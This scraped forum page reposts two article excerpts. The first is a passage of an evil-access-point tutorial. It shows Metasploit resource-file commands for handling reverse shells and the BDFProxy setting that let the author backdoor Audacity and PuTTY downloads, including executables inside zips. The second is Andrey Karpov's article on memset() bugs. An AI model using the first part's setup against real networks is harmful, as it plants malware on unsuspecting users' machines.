./bdfproxy Now that BDFProxy is up it has created a Metasploit resource file. It wasn’t entirely obvious at first where this file lived (it is not in /etc/bdfproxy/). It turns out the file is here: /usr/share/bdfproxy/bdfproxy_msf_resource.rc That resource file will help handle reverse shells. Time to open another terminal, navigate there and start up Metasploit: cd /usr/share/bdfproxy service postresql start cat bdf_msf_resource.rc #sanity check of conents, make sure IP update took msfconsole –r bdfproxy_msf_resource.rc After Metasploit is fired up we can see the resource file has loaded: Sweetness. Here is where I got stuck for a little bit. It appeared everything is set up and working properly. Mana was creating APs and I could connect and get back out to the internet. Iptables set up by Mana are correctly forwarding my traffic from port 80 to 8080 where BDFProxy is waiting. The problem is BDFProxy is failing to transparently proxy connections (mitmproxy underneath is actually failing). I got this error on all HTTP connections from my laptop test machine connected to the evil AP: HttpError('Invalid HTTP request form (expected: absolute, got: relative)',) It turns out I missed changing one of the default bdfproxy.cfg settings. The line transparentProxy = NoneNeeds to be changed to: transparentProxy = transparentAfter that BDFProxy was able to successfully backdoor executables. I connected to the AP with my laptop and download a file over http. I downloaded Audacity, and also tested with downloading Putty and PSFTP. Once BDFProxy gets its hooks in the backdoor is dropped in place: Here is the part that blew me away: executables within zips are backdoored, all done on the fly. How cool is that? For executable formats it not only works for Windows exe/PEs, but it does Linux ELF and Mach-O (that means you OSX!). Very cool stuff. - UPDATE 11/29/15: I've added some more content about BDFProxy in a new post here. 19 NOVEMBER 2015 Sursa: http://decidedlygray.com/2015/11/19/evil-access-point-with-auto-backdooring-ftw/
  25. Nytro
    The most dangerous function in the C/C++ world 03.12.2015Andrey Karpov Couple of words about me New observation. Examples Conclusion After checking hundreds of various C/C++ projects I can claim: memset() is the most inefficient and dangerous function. Most errors that I see in the projects are related to the usage of this particular memset() function. I understand that my conclusion is probably neither a revolutional one, nor an extremely useful one, but I think our readers would be interested to find out why I have come to it. Couple of words about me My name is Andrey Karpov. I do a lot of things in my life. But the main thing what I do is tell the programmers about the benefits of using static code analysis. Of course I do it pursuing an additional goal - I try to raise interest in PVS-Studio. However, this should not lessen the usefulness of my articles. The only form of advertising that can pierce through the armor of programmers' skepticism is the demonstration of the bugs that were found by PVS-Studio. For this purpose I run the analyzer on a big number of projects and write articles about the check results. This brings common benefits. Open-source projects are gradually getting better, and our company is obtaining new customers. You'll see what I'm leaning to. Doing numerous checks of open-source projects, I have gathered a pretty big collection of various bug examples. And now, based on it, I see interesting error patterns. For example, one of the most amusing observations was that most often programmers make mistakes using Copy-Paste at the very end. On this topic there is an article "The Last Line Effect" for those who may be interested. New observation. Now I have another interesting observation. Using one or another function, the programmers can make mistakes. That is clear, you may say. But the probability of the error may also depend on the function. In other words, some functions provoke errors, and some don't. And now I am ready to name the function which causes most of the troubles and using which you have the biggest chance of an epic fail. So, the biggest looser among the functions is the memset function! It's hard to say where is the root of this evil. Apparently it has an unfortunate interface. On top of it, its very usage is quite toilful and it's very easy to get wrong, evaluating values of the actual arguments. The second "Biggest looser" award goes to the printf() function and its variants. I guess it's no surprise. Only lazy people won't write about the danger of the printf() function. Probably the popularity of the issues related to the printf() functions brought it to the second place. All in all there are 9055 bugs in my storage. These are errors that PVS-Studio is able to detect. It is clear that this list is far being a complete one. However, such a large number of bugs allows me to be confident, making such statements about the functions. So, I figured that 329 errors are caused by the memset() function. In sum total, about 3,6% of bugs are related to this function! That's a lot, I should say. Articol complet: http://www.viva64.com/en/b/0360/
×
×
  • Create New...